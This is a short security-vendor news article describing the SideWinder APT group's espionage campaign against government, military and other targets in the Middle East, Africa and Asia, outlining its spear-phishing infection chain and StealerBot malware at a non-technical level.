ClickCease SideWinder APT Attacks Entities In Middle East And Africa - TuxCare

Join Our Popular Newsletter

Join 4,500+ Linux & Open Source Professionals!

2x a month. No spam.

SideWinder APT Attacks Entities In Middle East And Africa

by Wajahat Raja

October 29, 2024 - TuxCare expert team

Recent reports have claimed that an advanced president threat (APT) group with ties to India has launched multiple attacks in the Middle East and Africa. The threat actor group, being referred to as the SideWinder APT, has mainly targeted high-profile entities. In this article, we’ll dive into the attacks and uncover the exploited flaws. Let’s begin! 

The SideWinder APT Attack Group Unveiled  

Before diving into the details of the group, it’s worth mentioning that SideWinder APT threat actor goes by multiple names that include APT-C-17, Baby Elephant, Hardcore Nationalist, Leafperforator, Rattlesnake, Razor Tiger, and T-APT-04. Providing further insights about the threat actor, cyber security researchers from Kaspersky have stated that: 

“The group may be perceived as a low-skilled actor due to the use of public exploits, malicious LNK files and scripts as infection vectors, and the use of public RATs, but their true capabilities only become apparent when you carefully examine the details of their operations.”

As per recent reports, the SideWinder APT has targeted various sectors in multiple countries that include: 

Sectors  Countries 
  • Government. 
  • Military entities. 
  • Logistics Infrastructure 
  • Telecommunications companies. 
  • Financial institutions. 
  • Universities. 
  • Oil trading companies.
  • Bangladesh.
  • Djibouti. 
  • Jordan. 
  • Malaysia. 
  • The Maldives. 
  • Myanmar. 
  • Nepal. 
  • Pakistan.
  • Saudi Arabia. 
  • Sri Lanka. 
  • Turkey. 
  • U.A.E.

 

Apart from these targets, the threat actors have also been observed targeting diplomatic entities pertaining to Afghanistan, France, China, India, Indonesia, and Morocco.

Details Of The Attack Campaign 

One of the key aspects of the SideWinder APT attack campaigns is its use of a multi-stage infection chain. This infection chain is designed to deliver a post-exploitation toolkit called StealerBot. Attacks orchestrated by the SideWinder APT hacker start with a spear-phishing email. The email contains one of two payloads mentioned below. 

  1. A ZIP archive with a Windows shortcut (LNK) file.
  2. A Microsoft Word document.

Either of these payloads can be used for executing JavaScript and .NET downloads which deploy the StealerBot malware. While the Word document relies on remote template injections and exploits CVE-2017-11882, the LNK file uses the mshta.exe utility to run JavaScript code.

As of now, media reports have stated that the end goal of the SideWinder APT attacks is to aid espionage by fetching plugins that be used for various malicious initiatives like:  

  • Install additional malware. 
  • Acquiring screenshots.
  • Logging keystrokes.
  • Stealing passwords and files.
  • Intercepting RDP credentials.
  • Starting reverse shell.
  • Phishing Windows credentials.
  • Escalating privileges. 

Conclusion 

The SideWinder APT group’s sophisticated multi-stage attacks highlight its evolving capabilities in espionage and cyber warfare. By targeting high-profile sectors and leveraging tools like StealerBot, the group poses a significant threat to global cybersecurity, requiring vigilant defenses and advanced countermeasures to mitigate its impact.

The sources for this piece include articles in The Hacker News and Kaspersky.

Looking to automate vulnerability patching without kernel reboots, system downtime, or scheduled maintenance windows?

Become a TuxCare Guest Writer

Mail

Join

4,500

Linux & Open Source
Professionals!

Subscribe to
our newsletter